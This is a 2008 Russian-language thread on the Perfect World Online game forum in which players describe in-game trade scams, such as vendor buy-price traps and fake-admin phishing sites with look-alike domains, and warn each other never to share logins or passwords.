05.10.2008, 16:25
Прочитайте хотя бы 4 последние страницы, там рассказано про этот вид мошенничества.
Ситуация:
Колитесь кидалы!!!!
а тебе зачем?:spy:
BloodyMerry
06.10.2008, 11:00
Хочет перенять опыт. :D
Вас кидали на опыт?! Нет тогда смотрите как это делается))))
http://forum.pwonline.ru/showthread.php?p=265226#post265226
MilediWinter
06.10.2008, 16:42
Ситуация:
Колитесь кидалы!!!!
Мне рассказывали так:
По поводу котов. Если у игрока, который ставит кота ЗАБИТЬ все слоты инвентаря, то кот ничего купить не сможет.
Turkababa
06.10.2008, 17:09
веселье начнется потом :) кгда он распродаст все стрелы и место в инвентаре появится...
Zeratul777
07.10.2008, 19:58
Можно просто не все стрелы на продажу выставить. А способ вообще интересный, сам бы я до такого не додумался :D
мне сёдня предлагали чтото купить за 5000 и после я вроде как имею возможность продать это за 10000, типа акция для начинающих))
Сколько раз сталкивался с "кидалами" даже не перечесть. Было что и по глупости попадался на чью-то удочку. Да что там и сам занимался в линейке, только там шел развод админов при помощи "багоюзверства" (не будем вдоватся в подробности) ;)
"Кидалы" делятся на три группы по возрастанию: "начинающие кидалы", "менялы" и "опытные кидалы".
Начинающие "кидалы" занимаются легким разводом через трейд и тому подобное, в основном расчитывают на доверие "нулевых нубов" (люди не имеющие предстовления что такое ММОРПГ вобщем и целом).
"Менялы" увлечены кидательством по типу "Давай менятся персами" тут махинации идут с аккаунтами и тому подобным (легкая нажива для "опытных кидал" ;) )
"Опытные кидалы" занимаются "багоюзверством" (Bug use - использование багов) и разводом "по-крупному". С такими нужно быть очень осторожным. Хорошие актеры и в конце концов в большенстве случаев добиваются установленой цели. Могут давить на жалость, угражать... Вобщем вызвать у вас чувство вины/страха чтобы урвать свой кусок.
Способы борьбы одни и те же:
п1 Если к вам подбегают с каким-то ващным предложением сперва надо все разузнать, спросить в клане не знает ли кто о такой то фишке.
п2 Быть осторожным к резкому напору со стороны кого-либо (пытаются сбить с толку). Насторожено относится к незнакомым людям (не до паранои конешно, прятаться по кустам, но все же бдительность не терять)
Если попались...
п3 Заскринить место преступления и отправить скрин с пояснением ГМ'у
п4 Вывести "кидалу" на чистую воду в чате, п1
Альтернативные виды:
п0 Быть "кидалой". (если присутствует отсутствие головного мозга и неумение умения играть честно это полностью ваш, покрытый льдом путь шириной в 1-2 дня удовольствия)
KingJuby
11.10.2008, 10:07
Ненужная тема ИМХО
от нормального мошейника это http://forum.pwonline.ru/showthread.php?t=5042
никогда не спасёт,да и людей,которых не сможет кинуть проффесионал десятки,а нубы на ошибках учаться)
Опытные кидалы"[/color][/b] занимаются "багоюзверством" (Bug use - использование багов) и разводом "по-крупному"
Парень,те кто пользуется багами это скорее читеры=)бред какой то пишешь
RASStrelOK
12.10.2008, 08:49
На такое тоже не попадайтесь: здесь вид что чел продаёт по 50к а покупает по 2,3кк ЗАЦЕПКА:кпить у него мона а продать ему нельзя!
redkiska
12.10.2008, 10:23
Кстати, померять костюмчик можно и при продаже оного за юани :) Ставите кота, ставите нереальную цену за костюм.. меряйте на здоровье ;)
Со стилем действительно бывают проблемы, непонятно что как сидит.. вот и бегаешь по котам, примеряешь :)
А на такие просьбы действительно лучше не отвечать прытью и желанием помочь - хотя я бы предложила померять через магазин...
можно и не ставить кота нажать на персонажа появится верху его фото)) нажимаешь правой кнопкой на фото и потом на просмотр игрока там тоже есть примерка ))
Rinoa1337
12.10.2008, 11:04
а в инвентаре кнопка "примерка" неактуальна чтоли? о_О
redkiska
12.10.2008, 11:11
я атом люди спрашивают примерить вещи но можно не спрашивая примерять и нет не какого кидалово)))
а в инвентаре кнопка "примерка" неактуальна чтоли? о_О
Видимо нет))))
короче как бы вы не были осторожны всегда найдеться такой человек который может васм кинуть если он етого захочет
Lionaids
16.10.2008, 00:41
Не верь никому ни себе ни друзьям ни администрации. Вокруг одни обманщики которые только и ждут когда ты ошибешся..... Что???? Конечно я не параноик...)))
the_beginner
16.10.2008, 15:27
Не верь никому ни себе ни друзьям ни администрации.
Особенно администрации. Прикинуться администрацией - самый первый ход мошенника. "мы проводим супер-пупер-административно-важную операцию по поддержке сервера бла-бла-бла, удаляем неиспользуемые аккаунты. если вы используете ваш аккаунт то введите ваш логин и пароль вот на этом сайте: тратата_pwonline.ru". Такие тексты бывают - зачитаешься и почти поверишь. Спасает только неоднократное чтение статей про social engineering и тп.
Turkababa
16.10.2008, 15:29
А меня вот спасает элементарное знание компьютера. Я точно знаю, что админы и так знают мой логин и пароль, и что все, кто его не знает и спрашивает, не могут быть админами :)
GoodBadUgly
16.10.2008, 15:41
А меня вот спасает элементарное знание компьютера. Я точно знаю, что админы и так знают мой логин и пароль, и что все, кто его не знает и спрашивает, не могут быть админами :)
Хм... Админы, если авторизация сделана по правилам, а не через одно место, вашего пароля НЕ ЗНАЮТ и знать НЕ МОГУТ.
Более того, им ваш пароль до лампочки - все игровые данные перса они могут посмотреть через базу.
Именно поэтому, если кто-то где-то просит у вас пароль (не важно на что - игра, банк, мыло, одноклассники.ру и т.д.) - проходите мимо. В нормально написанных системах ваш пароль знаете только ВЫ.
Turkababa
16.10.2008, 15:51
По факту это приводит к одному и тому же результату. Админ может сделать все необходимые операции с тем же успехом, как если бы он знал мои пароль и логин.
the_beginner
16.10.2008, 16:13
Хм... Админы, если авторизация сделана по правилам, а не через одно место, вашего пароля НЕ ЗНАЮТ и знать НЕ МОГУТ.
Это уже наверное оффтоп, но все же для полноты:
Админы бывают разные. Есть суперпользователь на сервере, а есть допустим GM, или к примеру админ форума, у которого может не быть нужного доступа.
Так вот суперпользователь может получить все ваши пароли. И не только он, а например программист который имеет доступ к продакшн серверу. Просто добавив запись в файл в нужном месте и подождав пока вы войдете в систему, например. Или поставив снифер на сервере.
Но вывод у тебя все равно верный: никому паролей не давать тк никому они не нужны кроме мошенников.
По теме: не только пароль стоит держать в секрете а и логин. В письме вполне могут не просить пароль а попросить логин, или вообще пообещать 20 голда за анкетку, а для того чтобы заполнить анкетку надо будет залогиниться на сайте типа pvvonline.ru или pwonIine.ru со своим игровым логином-паролем.
Причем это может быть написано прямо в игре, красивым красным "админским" цветом.
А меня вот спасает элементарное знание компьютера
Не видели значит красивых текстов еще :)
MilediWinter
16.10.2008, 16:25
Или поставив снифер на сервере.
Ой бред ) Или если лишь речь об интернет клубах !
Turkababa
16.10.2008, 16:34
Не видели значит красивых текстов еще :)
Красивые тексты я сам писал :) поскольку я гуманитарий и мне во время учебы приходилось сочинять курсовые работы, а потом защищать диплом. А поскольку я имею опыт педагогической практики, а работаю вообще оператором техподдержки, то меня заболтать трудно. Это мне и помогает.
the_beginner
16.10.2008, 16:48
Ой бред ) Или если лишь речь об интернет клубах !
В клубе раутеры (router). На них-то как раз снифер не поможет - потому что если авторизация сделана по правилам то все шифруется.
В клубах могут быть кейлоггеры разной сложности.
Я говорю про админа сервера - то есть того человека у которого есть SSL-сертификат сервера, доступ к базе, сети, железу - ко всему. Вот он может получить любой пароль любого пользователя.
А вовсе не про админа клуба.
Так что бред как раз ваш, девушка. Не знаете - не лезьте.
Ломает 25 страниц читать, так что спрошу: короче столкнулся ч таким кидком:
стоит кот продает камень одного источника за 20000. Покупает за 970000...... Ну думаю, попробую. Купить - купил, а когда на продажу кинул - клацаю продать, камень ко мне вернулся и естественно никаких денег я не получил? Кто-то сталкивался с таким?
simvol_pw
16.10.2008, 20:48
Это основной вид кидаловства сейчас.
стоит кот продает камень одного источника за 20000. Покупает за 970000...... Ну думаю, попробую. Купить - купил, а когда на продажу кинул - клацаю продать, камень ко мне вернулся и естественно никаких денег я не получил? Кто-то сталкивался с таким?
Почитайте тему.
Вкратце: никогда не покупайте вещи у кота, который скупает их же, но дороже. Альтруистов в нашем мире нет.
MetalMaster
16.10.2008, 22:01
После того как попался на кидалово, желания почитать таки тему не появилось? :)
Трям! Сегодня решил качнуть сида, ко мне подбежал парнишка (лукарь) спросил нужны ли мне деньги,я ответил да,он спрашивает скока у меня денег потом кидает обмен,и предлагает купить банку на 40 лвл за 15к + вещи с инвентаря,я спросил зачем мне бутылка на 40+ лвл, на что он ответил, что я потом продам её за 300к любому хаю =))))
Боюсь предстваить себе перекошенное смехом лицо хая, когда ему буду совать банку на ХП за 300 к))
freedemon
17.10.2008, 22:41
Вот вопрос назрел про таких тел которые орут в чате не по одному часу: Продаем юани, ищем поставщиков, гарантия, смс оплата.<удалено модератором>, 40% скидки, кричат в основном. На основом сайте про этих поставщиков ни ****а не сказано. Кто нибудь пользовался их услугами?
Charliez
17.10.2008, 22:53
Это кидалово и за их услуги банят.
the_beginner
17.10.2008, 23:27
Кто нибудь пользовался их услугами?
Хороший вопрос! А ну-ка, нарушители правил (те кто пользовался "услугами"), срочно все отписались здесь, чтобы завтра быть забанеными LOL.
Я не знаю кидалово это или нет, но правилами запрещено, а это уже само по себе неплохая причина чтобы не ходить на те сайты.
freedemon
18.10.2008, 12:31
Извеняюсь, за предыдущий оффтоп. Но какие методы борьбы с такими вот рекламщиками? Каждый день они чат засоряют, и толку что их банят? Они же нового создают перса.
Quetzalkoatl
18.10.2008, 13:43
Самый клевый метод борьбы для отдельно взятого юзверя - отключение общего чата. 100% помогает.